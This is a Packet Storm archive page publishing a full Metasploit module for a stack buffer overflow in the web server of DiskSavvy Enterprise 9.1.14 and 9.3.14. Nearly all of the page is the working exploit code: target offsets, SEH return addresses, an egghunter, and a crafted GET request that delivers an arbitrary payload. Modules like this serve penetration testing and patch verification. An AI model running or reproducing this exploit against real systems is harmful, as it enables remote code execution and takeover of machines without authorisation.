exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DiskSavvy Enterprise 9.1.14 / 9.3.14 GET Buffer Overflow

DiskSavvy Enterprise 9.1.14 / 9.3.14 GET Buffer Overflow
Posted Jan 21, 2017
Authored by Gabor Seljan, Victor Portal Gonzalez | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise versions 9.1.14 and 9.3.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This Metasploit module has been tested successfully on Windows XP SP3 and Windows 7 SP1.

tags | exploit, web, overflow
systems | windows
SHA-256 | 303410a6bc0af29da23911eadcd3224ee78a40329f84d26089b70fd706ce9674

DiskSavvy Enterprise 9.1.14 / 9.3.14 GET Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
caused by improper bounds checking of the request path in HTTP GET
requests sent to the built-in web server. This module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan' # Metasploit module
],
'References' =>
[
['EDB', '40869']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20",
'Space' => 500
},
'Targets' =>
[
[
'Automatic Targeting',
{
'auto' => true
}
],
[
'DiskSavvy Enterprise v9.1.14',
{
'Offset' => 542,
'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll]
}
],
[
'DiskSavvy Enterprise v9.3.14',
{
'Offset' => 2478,
'Ret' => 0x101142ff # POP # POP # RET [libspp.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Dec 01 2016',
'DefaultTarget' => 0))
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)

if res && res.code == 200
version = res.body[/Disk Savvy Enterprise v[^<]*/]
if version
vprint_status("Version detected: #{version}")
if version =~ /9\.(1|3)\.14/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Detected
end
else
vprint_error('Unable to determine due to a HTTP connection timeout')
return Exploit::CheckCode::Unknown
end

Exploit::CheckCode::Safe
end

def exploit
mytarget = target

if target['auto']
mytarget = nil

print_status('Automatically detecting the target...')

res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)

if res && res.code == 200
if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
mytarget = targets[1]
elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
mytarget = targets[2]
end
end

if !mytarget
fail_with(Failure::NoTarget, 'No matching target')
end

print_status("Selected target: #{mytarget.name}")
end

eggoptions = {
checksum: true,
eggtag: rand_text_alpha(4, payload_badchars)
}

hunter, egg = generate_egghunter(
payload.encoded,
payload_badchars,
eggoptions
)

sploit = make_nops(10)
sploit << egg
sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
sploit << generate_seh_record(mytarget.ret)
sploit << make_nops(8)
sploit << hunter
sploit << rand_text_alpha(4500)

print_status('Sending malicious request...')

send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close